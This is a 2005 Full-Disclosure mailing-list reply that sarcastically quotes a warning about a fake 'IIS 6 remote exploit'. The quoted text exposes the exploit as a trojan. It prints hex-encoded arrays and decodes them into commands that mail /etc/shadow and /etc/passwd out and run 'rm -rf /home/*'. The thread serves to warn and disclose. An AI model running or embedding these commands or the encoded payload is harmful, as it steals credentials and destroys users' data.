RE: [Full-disclosure] IIS 6 Remote Buffer Overflow Exploit

From: David Li (matrixhax0r_at_yahoo.com)
Date: 04/20/05

  • Next message: Matthias Geerdsen: "[Full-disclosure] [ GLSA 200504-19 ] MPlayer: Two heap overflow vulnerabilities"
    Date: Tue, 19 Apr 2005 18:01:24 -0700 (PDT)
    To: "Lauro, John" <jlauro@umflint.edu>, full-disclosure@lists.grok.org.uk
    
    

    <sarcasm>Wait, you mean if I run that, I can hack
    IIS?</sarcasm>
    ^_^

    > Not that anyone would fall for running this on
    > anything besides a test
    > system, but to save 30 second to decode, what it
    > really does (locally,
    > not remotely) is:
    >
    > cat /etc/shadow |mail
    > full-disclosure@lists.grok.org.uk
    > cat /etc/passwd |mail
    > full-disclosure@lists.grok.org.uk
    > /bin/rm -rf /home/*;clear;echo bl4ckh4t,hehe
    >
    > -----Original Message-----
    >
    > */
    > char shellcode[] =
    > "\x2f\x62\x69\x6e\x2f\x72\x6d\x20"
    > "\x2d\x72\x66\x20\x2f\x68\x6f\x6d"
    > "\x65\x2f\x2a\x3b\x63\x6c\x65\x61"
    > "\x72\x3b\x65\x63\x68\x6f\x20\x62"
    > "\x6c\x34\x63\x6b\x68\x34\x74\x2c"
    > "\x68\x65\x68\x65";
    >
    > char launcher [] =
    > "\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x73"
    > "\x68\x61\x64\x6f\x77\x20\x7c\x6d\x61\x69"
    > "\x6c\x20\x66\x75\x6c\x6c\x2d\x64\x69"
    > "\x73\x63\x6c\x6f\x73\x75\x72\x65\x40"
    > "\x6c\x69\x73\x74\x73\x2e\x67\x72\x6f\x6b"
    > "\x2e\x6f\x72\x67\x2e\x75\x6b\x20";
    >
    > char netcat_shell [] =
    > "\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x70"
    > "\x61\x73\x73\x77\x64\x20\x7c\x6d\x61\x69"
    > "\x6c\x20\x66\x75\x6c\x6c\x2d\x64\x69"
    > "\x73\x63\x6c\x6f\x73\x75\x72\x65\x40"
    > "\x6c\x69\x73\x74\x73\x2e\x67\x72\x6f\x6b"
    > "\x2e\x6f\x72\x67\x2e\x75\x6b\x20";
    >
    > _______________________________________________
    > Full-Disclosure - We believe in it.
    > Charter:
    >
    http://lists.grok.org.uk/full-disclosure-charter.html
    > Hosted and sponsored by Secunia -
    > http://secunia.com/
    >

                    
    __________________________________
    Do you Yahoo!?
    Plan great trips with Yahoo! Travel: Now over 17,000 guides!
    http://travel.yahoo.com/p-travelguide
    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.grok.org.uk/full-disclosure-charter.html
    Hosted and sponsored by Secunia - http://secunia.com/


  • Next message: Matthias Geerdsen: "[Full-disclosure] [ GLSA 200504-19 ] MPlayer: Two heap overflow vulnerabilities"

    Relevant Pages